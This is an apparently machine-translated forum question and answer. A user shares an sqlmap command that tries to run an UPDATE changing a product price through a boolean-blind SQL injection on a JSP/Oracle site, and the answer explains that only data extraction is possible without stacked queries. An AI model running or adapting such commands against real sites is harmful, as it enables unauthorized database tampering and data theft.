¿Cómo actualizar la tabla con sqlmap y sin consultas apiladas?

4

voto negativo favorito Estoy tratando de usar el siguiente código

sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price" 
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'" 

Verifiqué este enlace antes y es inyectable en el parámetro de información (ciego basado en Boolean). El resultado de la ejecución del código anterior es:

warning: "execution of custom SQL queries is only available when stacked queries are supported"

¿Hay alguna solución para hacer esto?

Este sitio web se está ejecutando en Apache, JSP y Oracle.

    
pregunta user143049 26.03.2017 - 04:06
fuente

1 respuesta

1

No hay solución aquí. Por lo general, puede volcar toda la base de datos con una vulnerabilidad de inyección de SQL basada en boolean, pero no puede realizar actualizaciones.

Puede extraer pero no puede insertar o modificar los datos existentes.

    
respondido por el joe 26.03.2017 - 04:17
fuente

Lea otras preguntas en las etiquetas